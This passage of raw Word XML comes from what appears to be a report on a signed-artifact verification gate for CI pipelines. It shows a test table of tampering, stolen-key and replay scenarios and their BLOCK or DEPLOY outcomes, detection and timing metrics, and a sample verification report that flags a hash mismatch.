              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEPLOY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PASS</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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tampered artifact (1 line added)</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HASH_MISMATCH</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2b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tampered artifact + forged manifest hash</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INVALID_SIGNATURE</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3a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Signed with attacker's own key</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UNAUTHORIZED_KEY</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3b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attacker claims vendor key ID</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INVALID_SIGNATURE</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3d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unauthorized signing attempt (bob, developer)</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UNAUTHORIZED_SIGNER</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3e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Release manager with wrong MFA code</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UNAUTHORIZED_SIGNER</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3c-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Stolen key BEFORE revocation (content scan)</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POLICY_VIOLATION</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3c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Stolen key AFTER revocation</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REVOKED</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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Valid new release v1.0.1 (new key)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEPLOY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEPLOY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PASS</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4a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Replay old v1.0.0 (revoked signing key)</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REVOKED</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4b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Replay revoked v1.0.1 (valid signature)</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REVOKED</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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Registry trust policy modified</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1020"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>INVALID_TRUST_POLICY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PASS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="624"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Legitimate artifact restored (v1.0.2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEPLOY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEPLOY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PASS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PASS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7.4 Performance and Detection Metrics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 7.3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Measured results (Python 3.11.15)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5443"/>
        <w:gridCol w:w="3515"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5443"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Result</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Legitimate verifications (PASS rate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>200 runs, 100% PASS</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Verification time, all 10 checks (mean / median / p95)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2.17 / 2.04 / 2.63 ms</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Tampered samples (bit flip, byte insert or delete, appended exfiltration line)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1,000</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Tampered samples detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1,000 (detection rate 100.0%)</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False acceptance rate (target 0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>0.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5443"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Mean time to reject a tampered artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2.22 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5220000" cy="2827500"/>
            <wp:docPr id="7" name="Picture 7"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="verification_cost.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5220000" cy="2827500"/>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7.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Cost of SHA-256, Ed25519 signing and verification versus artifact size</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Even for a 10 MB artifact, hashing and signature verification each take only tens of milliseconds. That overhead is negligible compared with a typical CI job lasting minutes, so mandatory verification on every run is practical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7.5 Live Demonstration and Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>demo.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs the required 14-step demonstration: the attack explanation, the architecture, a legitimate release (SHA-256 and signatures displayed), TLS 1.3 download and PASS, one-line tampering, re-download over valid TLS, SHA-256 mismatch, signature failure, gate BLOCK with a security event, the audit log, key revocation, and restoration with PASS. The gate's report for the tampered download:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="C9CED6"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="C9CED6"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="C9CED6"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="C9CED6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="170"/>
        <w:jc w:val="left"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Verification report: secure-uploader@1.0.0  (key ed25519:a12990cfe21cc2f0)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  expected SHA-256 : bdfe8346562373e400cea24d3b130c8a4e3b44969da134b55ad0e7ad107c04bb</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  actual   SHA-256 : a1351e3dade5a7756d5857e50df3722d397307a321663303a17a901769516d81</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  PASS  trust_policy         root signature valid, policy v1</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  PASS  signer_authorized    key ed25519:a12990cfe21cc2f0 is a vendor release key</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  PASS  manifest_signature   Ed25519 manifest signature valid</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  FAIL  sha256               expected bdfe8346562373e4... got a1351e3dade5a775...</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  FAIL  artifact_signature   artifact signature INVALID (content modified)</w:t>
        <w:br/>
